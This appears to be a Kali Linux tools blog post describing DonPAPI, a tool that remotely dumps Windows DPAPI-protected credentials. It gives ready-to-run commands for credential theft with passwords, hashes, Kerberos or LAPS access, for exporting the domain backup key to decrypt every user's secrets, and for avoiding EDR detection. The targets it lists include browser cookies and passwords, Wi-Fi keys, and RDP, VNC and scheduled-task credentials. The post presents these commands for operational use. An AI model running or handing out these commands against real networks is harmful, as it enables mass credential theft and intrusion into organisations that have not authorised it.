Kali Linux

DonPAPI : Dumping DPAPI Credz Remotely

DonPAPI is a Dumping DPAPI Credz Remotely.

DPAPI Dumping

Lots of credentials are protected by DPAPI.

We aim at locating those “secured” credentials, and retreive them using :

  • User password
  • Domaine DPAPI BackupKey
  • Local machine DPAPI Key (protecting TaskScheduled blob)

Curently gathered info

  • Windows credentials (Taskscheduled credentials & a lot more)
  • Windows Vaults
  • Windows RDP credentials
  • AdConnect (still require a manual operation)
  • Wifi key
  • Intenet explorer Creentials
  • Chrome cookies & credentials
  • Firefox cookies & credentials
  • VNC passwords
  • mRemoteNG password (with default config)

Check for a bit of compliance

  • SMB signing status
  • OS/Domain/Hostname/Ip of the audited scope

Operational use

With local admin account on a host, we can :

  • Gather machine protected DPAPI secrets
    • ScheduledTask that will contain cleartext login/password of the account configured to run the task
    • Wi-Fi passwords
  • Extract Masterkey’s hash value for every user profiles (masterkeys beeing protected by the user’s password, let’s try to crack them with Hashcat)
  • Identify who is connected from where, in order to identify admin’s personal computers.
  • Extract other non-dpapi protected secrets (VNC/Firefox/mRemoteNG)
  • Gather protected secrets from IE, Chrome, Firefox and start reaching the Azure tenant.

With a user password, or the domain PVK we can unprotect the user’s DPAPI secrets.

Examples

Dump all secrets of the target machine with an admin account :

DonPAPI.py domain/user:passw0rd@target

Using user’s hash

DonPAPI.py –hashes : domain/user@target

Using kerberos (-k) and local auth (-local_auth)

DonPAPI.py -k domain/user@target
DonPAPI.py -local_auth user@target

Using a user with LAPS password reading rights

DonPAPI.py -laps domain/user:passw0rd@target

It is also possible to provide the tool with a list of credentials that will be tested on the target. DonPAPI will try to use them to decipher masterkeys.

This credential file must have the following syntax:

user1:pass1
user2:pass2

DonPAPI.py -credz credz_file.txt domain/user:passw0rd@target

When a domain admin user is available, it is possible to dump the domain backup key using impacket dpapi.py tool.

dpapi.py backupkey –export

This backup key can then be used to dump all domain user’s secrets!

python DonPAPI.py -pvk domain_backupkey.pvk domain/user:passw0rd@domain_network_list

Target can be an IP, IP range, CIDR, file containing list targets (one per line)

Opsec consideration

The RemoteOps part can be spoted by some EDR. It can be disabled using --no_remoteops flag, but then the machine DPAPI key won’t be retrieved, and scheduled task credentials/Wi-Fi passwords won’t be harvested.

Installation

git clone https://github.com/login-securite/DonPAPI.git
cd DonPAPI
python3 -m pip install -r requirements.txt
python3 DonPAPI.py

R K

Recent Posts

Install Pip on Ubuntu 18.04: Python 3 and Python 2 Setup Guide

Pip is the official package manager for Python and the standard way to install libraries from…

2 days ago

Install R on Ubuntu 18.04 from CRAN: Statistical Computing Setup

R is an open-source programming language and environment built for statistical computing and data visualization. It…

2 days ago

Install Jenkins on Ubuntu 18.04: CI/CD Server Setup Guide

Jenkins is an open-source automation server that makes it easy to build CI/CD pipelines. Continuous integration…

2 days ago

Install Android Studio on Ubuntu 18.04 with Snap and OpenJDK 8

Android Studio is the official IDE for Android development, built on JetBrains' IntelliJ IDEA platform. It…

2 days ago

Install and Configure GitLab on Ubuntu 18.04 with Omnibus

GitLab is a web-based, open-source Git repository manager written in Ruby. It includes built-in tools for…

2 days ago

Install Anaconda on Ubuntu 18.04: Python Data Science Setup Guide

Anaconda is the most widely used Python distribution for data science and machine learning. It bundles…

3 days ago